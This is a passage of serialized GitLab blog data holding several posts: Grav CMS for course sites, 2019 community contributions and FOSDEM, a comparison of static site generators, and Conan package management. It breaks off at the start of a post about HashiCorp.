to provide an open, collaborative and flexible environment that partners with his institution's LMS.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678561/Blog/Hero%20Images/open-course-environment.jpg","https://about.gitlab.com/blog/collaborative-course-environment-gitlab-grav","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Enabling an open and collaborative course environment with GitLab and the Grav CMS\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Paul Hibbitts\"}],\n        \"datePublished\": \"2017-10-12\",\n      }",{"title":1331,"description":1326,"authors":1332,"heroImage":1327,"date":1334,"body":1335,"category":10,"tags":1336},"Enabling an open and collaborative course environment with GitLab and the Grav CMS",[1333],"Paul Hibbitts","2017-10-12","\n\nTech-savvy educators! Do you want to:\n\n- Share your course materials more openly?\n- Support collaborative editing by students and fellow educators?\n- Deliver a better multi-device experience of your course materials?\n- Be able to update your online course materials in as little as 30 seconds?\n- And, in general, move beyond the constraints of your current Learning Management System?\n\n\u003C!-- more -->\n\nIf this sounds like you, then the combination of an institutionally hosted instance of [GitLab]() and a modern flat-file (no database) Content Management System such as [Grav](https://getgrav.org/) might be your answer!\n\nAs an educator and software interaction designer, I am always striving to deliver a better experience for my students, both in person and online. In the past several years this has led me to ‘flipping’ the Learning Management System, where I use an alternative platform instead of the LMS as the primary online environment. Many instructors (including myself) have taken this approach in the past using a traditional platform such as WordPress, but I found significant new benefits from partnering the LMS with a more modern platform that was built to take full advantage of the open and collaborative ecosystem (i.e. Git, GitLab, GitHub, etc.) we now have.\n\nWith the above approach, direct links are provided to any appropriate LMS elements and sensitive student data remains in the LMS. Common elements across multiple courses, like calendars, assignments, discussion forums, and grades are still stored in the LMS for single-point access by students. While perhaps not suited for university-wide adoption, this is a very viable and productive approach for individual instructors and their students while we wait for more open and adaptable institutional-level tools to become available.\n\n\u003Cimg src=\"/images/blogimages/gitlab-grav-open-course1.png\" alt=\"Open and Collaborative Flipped LMS Approach Using GitLab and the Grav CMS\" style=\"width: 500px;\"/>{: .shadow}\n\n*\u003Csmall>Open and Collaborative ‘Flipped’ LMS Approach Using GitLab and the Grav CMS\u003C/small>*\n\nFortunately, my university ([Simon Fraser University](http://www.sfu.ca/), or SFU, in Burnaby, BC, Canada) also provides an institutionally hosted instance of GitLab which not only gives me an ideal workspace for my online course materials, but also supports single sign-on so my students can easily contribute to these materials as well. By combining GitLab with the modern flat-file CMS Grav, my institution's LMS and a small collection of other open source web apps, I’ve been able to reach more of my desired teaching goals (such as providing an anytime, anywhere performance support tool with real-time chat) for my own courses than by using the LMS as the primary online space. In addition, I’ve made the resulting software open source to also help other instructors reach their own goals – more about this project at the end of this article!\n\n## Why open source software?\n\nThe advantages of using open source software in the field of education are well documented elsewhere (see [Open Source Software in Education](http://er.educause.edu/articles/2008/5/open-source-software-in-education)), but from my own viewpoint, the things I value most are: having more control over the software I use, the online communities often found with open software projects, public communication with the team developing the software, and the wide range of ways I can contribute to projects. I’ve also been keenly following several other open source, institutional-level learning ecosystem efforts, such as [ELMSLN](https://www.elmsln.org/) (a platform for building and sustaining innovation in course technologies) and [TSUGI](https://www.tsugi.org/) (a framework for building learning tools).\n\n## Why GitLab?\n\nGitLab meets several key criteria for its use in a learning ecosystem. First, it is open source software itself and secondly, it is possible to install an instance of GitLab on your own server. For universities and colleges this enhances the benefits of being open source in the first place as single sign-on and the storage of sensitive student data remains in the sole control of the institution.\n\nUsing GitLab in combination with the [GitHub Desktop application](https://desktop.github.com/) I can also very quickly update my online course sites from my desktop, while at the same time being able to then edit course site materials with any code editor I like. Most importantly, students feel like active course participants when they see they are welcome to suggest changes to the course site, or even just to make corrections to course materials. Everything is of course version controlled, which means as a repository administrator I can easily see each and every change before approving them. For changes not immediately approved I can then start a discussion via GitLab with the author of the proposed change to work out any needed further changes, etc. GitLab brings an industrial-strength software and document collaboration tool into the reach of my fellow university colleagues and students.\n\n## Why Grav CMS?\n\nWhile looking for an open source platform to support a learning ecosystem I evaluated multiple options, including self-hosting (for full administrative control) WordPress, Concrete5, Moodle and others. I then came across a number of apps under the category of ‘flat-file CMS,’ meaning that content was stored in files instead of a database. I could see that content as files would be a perfect partner for using a web-based Git service (such as GitLab, [GitHub](https://www.github.com/), [GitBook](https://www.gitbook.com/), etc.) to share and collaboratively edit content. With such a partnership, CMS content can be automatically backed up in a straightforward manner, while also tracking all revisions along the way. Digging deeper, I discovered the open source flat-file CMS Grav (by the team behind [RocketTheme](http://www.rockettheme.com/)) used Markdown – the native format for Web-based Git services such as GitLab – for content. Markdown is also an excellent system-independent format to support the ‘5Rs’ of Open Education Resources (Retain, Reuse, Revise, Remix, and Redistribute).\n\n\u003Cimg src=\"/images/blogimages/gitlab-grav-open-course2.png\" alt=\"Editing Markdown content in the Grav CMS Admin Panel\" style=\"width: 500px;\"/>{: .shadow}\n\n*\u003Csmall>Editing Markdown content in the Grav CMS Admin Panel\u003C/small>*\n\nGrav uses many existing modern standards and open source components, such as the very user-friendly [Twig language](https://twig.symfony.com/) (courtesy of Symfony) instead of pure PHP for theme templating. Grav also supports modular and custom content types, and was designed from the ground-up to be both fast and extensible. In addition, with the creation of the open source Git Sync plugin (by [Trilby Media](https://trilby.media/)) it is now easier than ever to do two-way syncing of Grav content between a production server, Git repository and an optional local development instance. It is even  possible to sync theme files, which determine the actual functionality and presentation of a site, so  educators (or perhaps their tech-savvy students) can directly help other educators needing assistance in additional customization of their Grav sites.\n\nIt should be noted that Grav is not a static site generator, but rather a file-based CMS which supports not only dynamic content but also an online Admin Panel.\n\n## CMPT-363 Open Course Hub\n\nFor my SFU course CMPT-363 User Interface Design this Fall, I will not only be using GitLab and Grav (hosted on the educationally focused [Reclaim Hosting](https://reclaimhosting.com/)), but also a number of other web apps (also mostly open source) to provide a learning ecosystem to my students. Since Grav itself is open and extensible, I can easily add in Javascript elements for a Livechat (which my students have told me they love) thanks to [Rocket.Chat](https://rocket.chat/), responsive Markdown-based slide embeds thanks to the commercial [Swipe.to](https://www.swipe.to/home) web app, and links to an anonymous course feedback form thanks to [Sandstorm.IO](https://sandstorm.io/) and [Quick Survey](https://github.com/simonv3/quick-survey). To address both various other teaching goals (the LMS actually does some things quite reasonably) and student data privacy concerns, I still use the institutional LMS [Canvas](https://www.canvaslms.com/) by Instructure to support a wide range of course elements such as quizzes, assignment submissions, discussion forums, and gradebook. You can see this multi-device friendly Course Hub in action at [paulhibbitts.net/cmpt-363-173/](http://paulhibbitts.net/cmpt-363-173/).\n\n\u003Cimg src=\"/images/blogimages/gitlab-grav-open-course3.png\" alt=\"CMPT-363 Open Course Hub Learning Ecosystem\" style=\"width: 500px;\"/>{: .shadow}\n\n*\u003Csmall>CMPT-363 Open Course Hub Learning Ecosystem\u003C/small>*\n\n## The Open Course Hub Project\n\nBased on the [very positive student feedback](https://storify.com/paulhibbitts/flipped-lms) and my own experiences with the 2015 CMPT-363 Course Hub, I decided to release an open source version of a pre-packaged Course Hub with Git Sync the following year (called a Skeleton in Grav-speak, which is a ready-to-run package that includes Grav and all needed theme and example content files). While this package can be installed in [less than a minute](https://www.youtube.com/watch?v=8yyE-LaAa8Y) and fully configured in [under five minutes](https://www.youtube.com/watch?v=jnBig4aGfFg) it is intended for fellow tech-savvy educators to use and further customize as they see fit.\n\n\u003Cimg src=\"/images/blogimages/gitlab-grav-open-course4.png\" alt=\"CMPT-363 Open Course Hub Web Page\" style=\"width: 500px;\"/>{: .shadow}\n\n*\u003Csmall>CMPT-363 Open Course Hub Web Page\u003C/small>*\n\nWhat are the exact skills currently expected? In general, you should be comfortable with accessing files on a website server, understand folder hierarchies, be familiar with Markdown (here is a [10-minute Markdown tutorial](https://designedbywaldo.com/en/tools/markdown-tutorial)), and have a working knowledge of using GitLab or GitHub. Being able to use [GitHub Desktop](https://desktop.github.com/) and a desktop code editor like [Atom.io](https://atom.io/) or [Adobe Brackets](http://brackets.io/) will also bring the ability to store a copy of your Grav site content on your local desktop and then selectively edit and push changes back to the Git repository for deployment to your live Grav Course Hub site. Step-by-step install and configuration instructions for the Grav Course Hub are available at [learn.hibbittsdesign.org/coursehub](http://learn.hibbittsdesign.org/coursehub).\n\nThis is also my way to give back to the open source community in general, which has been so helpful in the development of my own original CMPT-363 Course Hub. Using Grav and the Git Sync plugin I’ve released several additional Open Education Resources (OER) projects, including the Open Publishing Space, and all of these are available at [learn.hibbittsdesign.org](http://learn.hibbittsdesign.org/).\n\nQuestions or comments about using GitLab as an open and collaborative backbone to your learning ecosystem? Please feel free to contact me via email ([paul@hibbittsdesign.org](mailto:paul@hibbittsdesign.org)) or Twitter [@hibbittsdesign](https://twitter.com/hibbittsdesign). You can also read more about my learning ecosystem explorations at [hibbittsdesign.org/blog](http://www.hibbittsdesign.org/blog/).\n\n*Special thanks to the folks at GitLab for the kind offer to provide this guest blog post, and everyone from the Grav community and my Twitter network who provided helpful feedback and comments on the draft versions of this post!*\n\n### About the guest author\n\nPaul Hibbitts has been an interaction design practitioner and educator for over 20 years, and has recently ventured into the world of open source software development thanks to the amazing Grav CMS.\n\n\n[Cover image](https://unsplash.com/photos/Y94yKEyNjVw) by [chuttersnap](https://unsplash.com/@chuttersnap) on unsplash\n{: .note}\n",[9,779],{"slug":1338,"featured":6,"template":689},"collaborative-course-environment-gitlab-grav","content:en-us:blog:collaborative-course-environment-gitlab-grav.yml","Collaborative Course Environment Gitlab Grav","en-us/blog/collaborative-course-environment-gitlab-grav.yml","en-us/blog/collaborative-course-environment-gitlab-grav",{"_path":1344,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1345,"content":1351,"config":1356,"_id":1358,"_type":14,"title":1359,"_source":16,"_file":1360,"_stem":1361,"_extension":19},"/en-us/blog/community-update-for-2019",{"title":1346,"description":1347,"ogTitle":1346,"ogDescription":1347,"noIndex":6,"ogImage":1348,"ogUrl":1349,"ogSiteName":673,"ogType":674,"canonicalUrls":1349,"schema":1350},"Celebrating wider community contributions in 2019 and returning to FOSDEM","Here's what the wider community accomplished in 2019 and where to find GitLab at FOSDEM'20.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663430/Blog/Hero%20Images/2018-09-13-gitlab-hackathon-cover.jpg","https://about.gitlab.com/blog/community-update-for-2019","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Celebrating wider community contributions in 2019 and returning to FOSDEM\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2020-01-24\",\n      }",{"title":1346,"description":1347,"authors":1352,"heroImage":1348,"date":1353,"body":1354,"category":951,"tags":1355},[704],"2020-01-24","\n\n{::options parse_block_html=\"true\" /}\n\n\n\nFirst of all, I would like to wish everyone in the GitLab Community a Happy New Year! There's been an impressive growth in the wider GitLab community in 2019 and I wanted to share and celebrate what we all accomplished. \n\nThe first chart below shows merged MRs from the wider community beginning with the 11.0 release. We obviously have a nice trendline, but we also had a record number of merged MRs for the 12.6 release (nearly 250!) and this was a great way to close out 2019! \n\n![Wider community contributions per release](https://about.gitlab.com/images/blogimages/Wider_community_contributions_per_release-Dec2019.png){: .medium.center}\n\nI also want to show some numbers on the wider community growth over the past 3 years. As you will see in the chart below, the number of  contributors almost doubled between 2018 and 2019 as we had almost 900 contributors with merged MRs last year. In terms of the number of merged MRs, we had 2400+ MRs in 2019 which is more than 30% increase from the previous year. I really need to congratulate and thank everyone in the wider community for your contributions as these numbers clearly show that GitLab is a thriving open source community. Beyond MRs or code, we appreciate your insight and perspective from your contributions. \n\n![Community contributions in 2018 and 2019](https://about.gitlab.com/images/blogimages/2019_Wider_Community_Contributors_and_Merge_Requests.png){: .medium.center}\n\nI also updated the [top contributors page](https://about.gitlab.com/community/top-annual-contributors/) with the final numbers from 2019. The number of regular contributors with 5 or more merged MRs during the year also saw a significant increase from 2018 (35) to 2019 (68). The growth in regular contributors is something we tried to focus on last year, and I'm impressed with the result. Congratulations to everyone who made the list, and your GitLab souvenir will be coming to you soon.\n\n\n### Let's meet at FOSDEM\n\nNow I want to switch gears to what's happening at [FOSDEM](https://fosdem.org/2020/) on February 1st and 2nd. Last year, GitLab had a stand at FOSDEM for the first time and we were overwhelemed with the amount of people who came to talk to us. I'm excited to announce that we will be back with a stand at FOSDEM and look forward to meeting with community members. Our stand will be at Building K/Level 1 and [this page](https://fosdem.org/2020/stands/) will help you find where the GitLab stand is. \n\nWe will also have a meetup session on Sunday as a part of a Birds of a Feather (BOF) track on Sunday (February 2nd) morning between 10:00 - 11:00 in room J.1.106. You can find details on the meetup at [this FOSDEM page](https://fosdem.org/2020/schedule/event/bof_gitlab/).  \n\nIn addition, a couple of GitLab team members are giving talks in devrooms. [Alessio Caiazza](https://gitlab.com/nolith) will discuss [building a smart reverse proxy in Go](https://fosdem.org/2020/schedule/event/speedupmonolith/) and I will have the opportunity to discuss [why community matters in corporate open source projects](https://fosdem.org/2020/schedule/event/corpcommunitythrive/).  \n\nFinally, we are working on organizing a Happy Hour on Saturday (February 1st) evening, so stay tuned for more news on this! I hope to see many of you at FOSDEM, and I'll try to make frequent announcements/posts on Twitter during the conference.\n",[267,779,9],{"slug":1357,"featured":6,"template":689},"community-update-for-2019","content:en-us:blog:community-update-for-2019.yml","Community Update For 2019","en-us/blog/community-update-for-2019.yml","en-us/blog/community-update-for-2019",{"_path":1363,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1364,"content":1370,"config":1377,"_id":1379,"_type":14,"title":1380,"_source":16,"_file":1381,"_stem":1382,"_extension":19},"/en-us/blog/comparing-static-site-generators",{"title":1365,"description":1366,"ogTitle":1365,"ogDescription":1366,"noIndex":6,"ogImage":1367,"ogUrl":1368,"ogSiteName":673,"ogType":674,"canonicalUrls":1368,"schema":1369},"How to choose the right static site generator","Here's an in-depth look at 6 static site generators that deploy to GitLab Pages.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682290/Blog/Hero%20Images/kelly-sikkema-gchfxsdcmje-unsplash-resized.jpg","https://about.gitlab.com/blog/comparing-static-site-generators","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to choose the right static site generator\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Fatima Sarah Khalid\"}],\n        \"datePublished\": \"2022-04-18\",\n      }",{"title":1365,"description":1366,"authors":1371,"heroImage":1367,"date":1373,"body":1374,"category":801,"tags":1375},[1372],"Fatima Sarah Khalid","2022-04-18","\n\nMost websites today fall into two categories - dynamic sites and static sites:\n\n## Dynamic sites\n\nDynamic sites are interactive, and the user experience can be tailored to the visitor. These are the ones that might remember who you are across visits or deliver content that's most applicable to the region you're visiting from. They rely on a content management system (CMS) or database for rendering and can continue to grow in complexity as the organization's needs grow. \n\n## Static sites\n\nStatic sites, however, generally display the same content to all users. They use server-side rendering to serve HTML, CSS, and Javascript files. While CMS backends have made dynamic sites easier to launch and maintain, static sites continue to grow in popularity.\n\n## What is a static site generator?\n\nA static site generator (SSG) is a software tool that generates a static website by processing plain text files that contain the websites content and markup. The resulting website consists of a set of HTML, CSS, and JavaScript files, and other assets, that can be served by a web server to visitors.\n\nTo use a static site generator, you typically write your website's' content in a markup language like Markdown, and use a templating language to define the website's layout and structure. You then run the static site generator to generate the final set of HTML, CSS, and JavaScript files, which can be deployed to a web server or content delivery network (CDN) for visitors to access.\n\n## Benefits of using a static site generator\n\nStatic sites' advantages include speed, security, and SEO. They're also easy to maintain and highly scalable. Because the static site generators store an already-compiled page on a CDN, they load a lot faster.\n\nAs static site generators are comprised solely of static files, no database is required, resulting in many additional benefits:\n\n* There is no need to spend valuable time querying the database or running any resource-intensive server-side scripts.\n\n* There are no extraneous libraries, no databases, or other features that a dynamic generator is built with. All you have are static files. Therefore, it’s very simple to work with and migrate as needed.\n\n* There’s no database for would-be hackers to attack. \n\n* Since there is no need for scripts to run on a file-based generator, scaling is very easy without overwhelming your server.\n\nAll static site generators can be exciting and fun, but some require time and effort on configurations, detailed templating, or management tweaks. My team and I joke that I am one of the top blog-less SSG experts, so in this blog post, I’ll walk you through a toolkit for evaluating your project and then share some SSGs that deploy to GitLab Pages. \n\nHere are the SSGs I'll review in this post:\n\n- [**Hugo**](https://gohugo.io/) is written in Go with support for multi-language sites and complex content strategy.\n- [**Zola**](https://www.getzola.org) is written in Rust with a single binary, no dependencies, and flexible features like Sass compilation.\n- [**Jekyll**](https://jekyllrb.com/) is written in Ruby, built for blogging, and has a large collection of plugins and themes.\n- [**Hexo**](https://hexo.io/) is Node.js based with support for multiple templating engines, integrations with NPM packages, and one command deployment.\n- [**GatsbyJS**](https://www.gatsbyjs.com/) is React-based, works with any CMS, API, or database, and can be used for building headless experiences.\n- [**Astro**](https://gitlab.com/pages/astro) is Javascript-based, supports multiple frameworks, and is known for on-demand rendering via partial hydration.\n\n##  An Evaluation Toolkit\n\nWith so many static site generators available, selecting one for your project can be overwhelming. When evaluating which SSG is right for you, here are a few things to consider about your project, use case, and the type of work you're looking to put into the site. \n\n**Identify the use case**\n\nIt’s important to understand your site's needs, purpose, and content. Are you building a personal blog, a landing page for a product, or documentation for a tech project? Consider whether you need a streamlined editor experience, content, and interactions with your user. The better you can identify the experience you'd like your visitors to have, the easier it will be to pick the feature set that can best support it. \n\n**Specify languages and frameworks**\n\nThere are so many static site generators out there that you can find one in nearly every language and framework. Consider whether you want to learn a new language or use something you're familiar with. Depending on how much time you’d like to invest in setting up, you should also review the installation details and see if you’re familiar with the templating language, dependencies, and theming layer. \n\n**Review the ecosystem**\n\nMany static site generators will have starter repositories or sample sites where you can play around with functionality and components before diving into your project. When reviewing the ecosystem, think about the limitations of the templating engine and whether you’ll need dynamic or Javascript components, and how you’ll include them. Some generators will have out-of-the-box or community-contributed plugins and extensions. \n\n**Check out the community**\n\nThere are often Discord or forum communities where you can get support, share ideas, review cases studies, and see what other people are building. Some of the most popular generators might even have conferences or workshops for getting started on more complex topics. \n\n**Identify the specialty** \n\nFrom microblogging to academic portfolios and small business sites, static site generators cover various use cases for different people. Each SSG has its own thing, whether it’s the framework it uses, a unique feature in its templating language, or the size of the installation binary.\n\n## The Single Binary Approach \n\nSome static site generators install a single binary and don't require complex dependency management. The single binary approach gets things set up quickly and easily. It is also easier for non-technical or academic users since you can pass the executable around for installation and use a markup language like Markdown to write content. \n\n[**Hugo**](https://gohugo.io/) is written in Go, a statically compiled language, with support for multiple platforms. The Hugo binary can be downloaded and run from anywhere and is simple to install, with no runtime dependencies or installation process. Upgrades involve downloading a new binary, and you're all set. Hugo supports unlimited content types, taxonomies, dynamic content driven from an API, multi-lingual sites, and markdown. It also ships with premade templates making it easy to get started with menus and site maps. \n\nOne of the advantages of using Hugo is that it doesn't depend on client-side JS. It also has a thriving community with many prebuilt themes and starter repositories. There is an [existing sample site in Hugo that deploys to GitLab pages](https://gitlab.com/pages/hugo). If you're migrating to Hugo from another SSG, you can use the [hugo import](https://gohugo.io/commands/hugo_import/) command or one of the [community-developed migration tools](https://gohugo.io/tools/migrations/). There's a [Hugo site example](https://gitlab.com/pages/hugo) on GitLab pages to help you get started.\n\n[**Zola**](https://www.getzola.org) is a strongly opinionated SSG written in Rust that uses the Tera template engine. It's available as [a prebuilt binary](https://github.com/getzola/zola/releases), is super-fast to set up, and comes with some essential features like syntax highlighting, taxonomies, table of contents, Sass compilation, and hot reloading. The Tera templating engine supports build-in short-codes to inject more complex HTML or for repetitive data-driven sections. Configuration for Zola sites is managed in TOML.\n\nOne of the limitations of Zola might be the lack of a built-in scripting language. Unlike other SSGs, there isn't an ecosystem of plugins you can add to your site. Many in the community appreciate this lack of modularity because Zola’s specialty is content-driven sites. [One of the most popular posts on their Discourse forum is a proposal for plugins](https://zola.discourse.group/t/proposal-plugin/975) which discusses ways to include dynamic loading for plugins without affecting the single binary distribution. \n\nZola is commonly used for content-driven websites. One of its notable features is how content is structured using a tree with sections and pages.  There is no example site on GitLab pages, but the Zola documentation includes a [guide on how to deploy to GitLab pages](https://www.getzola.org/documentation/deployment/gitlab-pages/). \n\n## The Standard Approach\n\nWhen it comes to generators and frameworks, you might hear, \"Boring is better.\" Sometimes the preferred SSG is feature complete, well documented, and has a community of examples and plugins to support it - even if it's not actively growing anymore. \n\n[**Jekyll**](https://jekyllrb.com/) is a static site generator written in Ruby and released in 2008. It paved the way for static sites by replacing the need for a database and inspiring developers to start creating blogs and documentation pages quickly and easily. It uses the Liquid templating language, has a vast plugin ecosystem, and is known to be beginner-friendly since it’s just HTML (or Markdown, if you prefer). While it doesn’t provide many features out of the box, Jekyll supports Ruby plugins for any functionality you might need. There are over [200 plugins](https://github.com/topics/jekyll-plugin), themes, and resources available to use.\n\nOne of the challenges when working with Jekyll can be the requirement of having a whole Ruby development environment to build your site. This can be tricky for developers unfamiliar with Ruby or when making updates. Another thing to consider is the build pipeline - it supports Sass compilation out of the box, but the community recommends using webpack to build assets instead. If you're migrating to Jekyll from another framework or CMS, there are [importers](https://import.jekyllrb.com/docs/home/) that can help automate part of the process. There is a [Jekyll site example that deploys to GitLab pages](https://gitlab.com/pages/jekyll).\n\n[**Hexo**](https://hexo.io/) is a NodeJS static site generator that offers itself as a blogging framework. It has built-in support for Markdown, front matter, and tag plugins. It specializes in creating markup-driven blogs. Hexo provides the Nunjucks template engine by default, but you can easily install additional plugins to support alternative templating engines. Like Jekyll, Hexo also [supports migrations](https://hexo.io/docs/migration#content-inner) from several popular frameworks, including WordPress. \n\nA notable feature of Hexo is tag plugins. Tag plugins are snippets of code you can add to your Markdown files without having to write complex or messy HTML to render specific content. Hexo supports several tag plugins, including block quotes, Twitter and Youtube embeds, and code blocks. There’s an [example site for Hexo that deploys to GitLab pages](https://gitlab.com/pages/hexo) and also a [guide in the Hexo documentation](https://hexo.io/docs/gitlab-pages). \n\n## SSGs and beyond\n\nFor those who love flexibility and modularity, there are some SSGs that allow you do everything from full content moderation support and dynamic API-driven content to state management and partial rendering. \n\n[**GatsbyJS**](https://www.gatsbyjs.com/) is an open-source React-based static site generator optimized for speed and has an extensive plugin library. GatsbyJS supports routing, and handling images, accessibility, and hot reloading out of the box. To improve performance, it loads only the critical elements of the page and prefetches assets for other pages to load them as quickly as possible. It also uses webpack to bundle all of your assets. \n\nGatsbyJS believes in a “content mesh” where third-party platforms provide specialized functionality to the base architecture. It allows you to seamlessly pull data from multiple sources, making it popular for Headless approaches with a CMS backend like Drupal, WordPress, or Contentful. You use GraphQL to query the APIs and manage data throughout your site. The GatsbyJS community has contributed over 2000 plugins, including starter repositories and templates that you can use to get started. There’s an [example GatsbyJS site that deploys to GitLab pages](https://gitlab.com/pages/gatsby). \n\n[**Astro**](https://gitlab.com/pages/astro) is a Bring Your Own Framework (BYOF) static site generator with no package dependencies. You can build your site with any JavaScript framework or web components, and Astro will render it into static HTML and CSS. This flexibility has made it popular since it’s future-proof for migrations. Astro ships with automatic sitemaps, RSS feeds, and pagination. It uses Snowpack to compile Javascript, which supports hot module replacement, ES6 modules, and dynamic imports without extra configuration. The project is still a [Beta release with the 1.0 coming in June 2022](https://twitter.com/astrodotbuild/status/1512505549354639363?s=20&t=zXDUGuYmbiOp08FTETXw5A). \n\nA notable feature of Astro is partial hydration. If you decide that parts of your site need interactivity, you can “hydrate” just those components when they become visible on the page. This way, your pages will load super fast by default and have [“islands of interactivity”](https://docs.astro.build/en/core-concepts/partial-hydration/#island-architecture). There are several themes, plugins, components, and showcase projects available. Astro has [an online playground](https://astro.new/) where you can try out features and integrations in your browser. There’s also [an Astro example site on GitLab pages](https://gitlab.com/pages/astro). \n\n## Creating your own SSG\n\nSometimes, the best part of building a static site is creating a custom generator based on a specific programming language, architecture, and feature set. You might find that the process of creating a static site generator is more exciting than actually writing blogs for your site. Consider several preferences, from document structure to a templating language, theming support, custom plugins, and the build pipeline. You’ll have the opportunity to customize the features to your liking. And there are many [static site generators that deploy to GitLab pages](https://gitlab.com/pages) to provide inspiration! \n\n\nCover image by [Kelly Sikkema](https://unsplash.com/photos/gcHFXsdcmJE) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[1376,267,9],"frontend",{"slug":1378,"featured":6,"template":689},"comparing-static-site-generators","content:en-us:blog:comparing-static-site-generators.yml","Comparing Static Site Generators","en-us/blog/comparing-static-site-generators.yml","en-us/blog/comparing-static-site-generators",{"_path":1384,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1385,"content":1390,"config":1396,"_id":1398,"_type":14,"title":1399,"_source":16,"_file":1400,"_stem":1401,"_extension":19},"/en-us/blog/conan-c-cpp-package-management-integration",{"title":1386,"description":1387,"ogTitle":1386,"ogDescription":1387,"noIndex":6,"ogImage":1211,"ogUrl":1388,"ogSiteName":673,"ogType":674,"canonicalUrls":1388,"schema":1389},"Modern C and C++: How Conan integration works in GitLab","Conan is a leading C and C++ package manager and it is now available in GitLab. Store and share packages easily with your teams or publicly.","https://about.gitlab.com/blog/conan-c-cpp-package-management-integration","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Modern C and C++: How Conan integration works in GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jordi Mon\"}],\n        \"datePublished\": \"2020-03-31\",\n      }",{"title":1386,"description":1387,"authors":1391,"heroImage":1211,"date":1393,"body":1394,"category":801,"tags":1395},[1392],"Jordi Mon","2020-03-31","\n\nAs a single application for all the software development and delivery lifecycle, GitLab strives to support all the different software workflows and pipelines. Regardless of how complex this cycle might be (I’m looking at you C++), what we want to do is soothe these pains for C and C++ GitLab users. Following up on this metaphor, as doctors we would like to listen to the patient first: It all started with our community explaining their symptoms and chipping in the first ideas [here](https://gitlab.com/gitlab-org/gitlab-foss/issues/54747). This became even more relevant for GitLab when clients in C++ reliant industries like finance, robotics or embedded software added their interest to supporting package management for C++.\n\n### Conan is now available on GitLab\n\nThe C and C++ ecosystems have a ton of legacy tooling. It is what it is: they’ve been around for a long time and the community is, in a way, very DIY-driven. For example, many C++ libraries are advertised as “Zero deps inside.” This badge is intended as a sign of quality, and is even a bit of a status symbol for the devs and maintainers. That's fine for C/C++ developer but what about the users of such libs? Regardless of the actual quality of the lib’s code, if you wanted to use any of them, you’d better have a local, updated copy of them in a Git submodule. This is especially relevant for head-only monsters like Boost, the most popular set of libs in C++. In other words, in order to make use of them (that’s why they were created in the first place, I guess), you basically have to download the [source code](/solutions/source-code-management/), build it yourself (good luck with that), compile it and include the resulting binary in your project. This process can be time consuming and, if build processes are not well documented or supported, it can be exasperating. All of this can become a real nightmare if transitive dependencies are present, or if different [version control systems](/topics/version-control/) have been used. It's also tricky when deciding upon static or dynamic binaries, static or dynamic linking, single or multi-threaded, 32-bit or 64-bit…\n\n### How to build C and C++ packages in GitLab the Conan way\n\nThe GitLab Conan integration allows Conan users to set GitLab as the remote registry for their packages. Users will be able to set the remote and upload and install packages from GitLab’s registry. Think of it this way: you still use the same CLI to work with your Conan packages, but GitLab is on the receiving end. In doing so, GitLab creates the unique opportunity to have the code and package generated from the code living in the same place, freeing users from having to manage multiple services to store packages and code separately and still have them working together. This allows users to share private packages within an organization that is already using GitLab, publish public packages for general or open source use, and will open up many possibilities in utilizing GitLab’s CI pipelines to build and consume these packages automatically.\n\nCheck out a full demo:\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/2VVmrKNpC_0\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n or a speedrun of Conan performed by the team in charge of the integration:\n\n \u003C!-- blank line -->\n \u003Cfigure class=\"video_container\">\n   \u003Ciframe src=\"https://www.youtube.com/embed/7NYgJWg-w5w\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n \u003C/figure>\n \u003C!-- blank line -->\n\nIf you need more help you can always refer to the [Conan docs](https://docs.conan.io/en/latest/).\n\n### The future of C and C++ in GitLab: Game development workflows!\n\nWhat’s coming next? In tradition with GitLab’s value of iteration, the initial release of Conan is a bare-bones API that allows you to publish and consume packages within GitLab. Next up will be a UI that displays much of the commonly referenced metadata for a given package, pre-written CI templates for automatic package publishing and consuming, less strict package naming conventions with remotes scoped to the group and project level within GitLab, and the list goes on.\n\n* [Conan Repository User Interface](https://gitlab.com/gitlab-org/gitlab/issues/33892)\n* [Project and Group level support for Conan Repository](https://gitlab.com/gitlab-org/gitlab/issues/11679)\n\nIf you are interested in package management at large, find a list of publicly available issues about the topic [here](https://gitlab.com/gitlab-org/gitlab/issues?label_name=Package+Repositories). Also, please note that if game development is your interest, large file support, partial clone and many other features that make game development possible with Git, will soon be available in GitLab. All the heavy lifting required for those massive binaries, engines, and animations will feel like feathers when we release those features. Stay tuned to know more about it in our newsletter.\n\n",[1099,231,9,686],{"slug":1397,"featured":6,"template":689},"conan-c-cpp-package-management-integration","content:en-us:blog:conan-c-cpp-package-management-integration.yml","Conan C Cpp Package Management Integration","en-us/blog/conan-c-cpp-package-management-integration.yml","en-us/blog/conan-c-cpp-package-management-integration",{"_path":1403,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1404,"content":1410,"config":1415,"_id":1417,"_type":14,"title":1418,"_source":16,"_file":1419,"_stem":1420,"_extension":19},"/en-us/blog/congratulations-to-hashicorp",{"title":1405,"description":1406,"ogTitle":1405,"ogDescription":1406,"noIndex":6,"ogImage":1407,"ogUrl":1408,"ogSiteName":673,"ogType":674,"canonicalUrls":1408,"schema":1409},"Congratulations to HashiCorp! Enjoy the cake!","We’re thrilled to see our open source and tech partner HashiCorp join us in the public market. Public companies like HashiCorp, MongoDB, Confluent, and GitLab show that with the right business models, open source can be highly profitable. Here’s a look at HashiCorp’s history, our partnership, and a nod to the 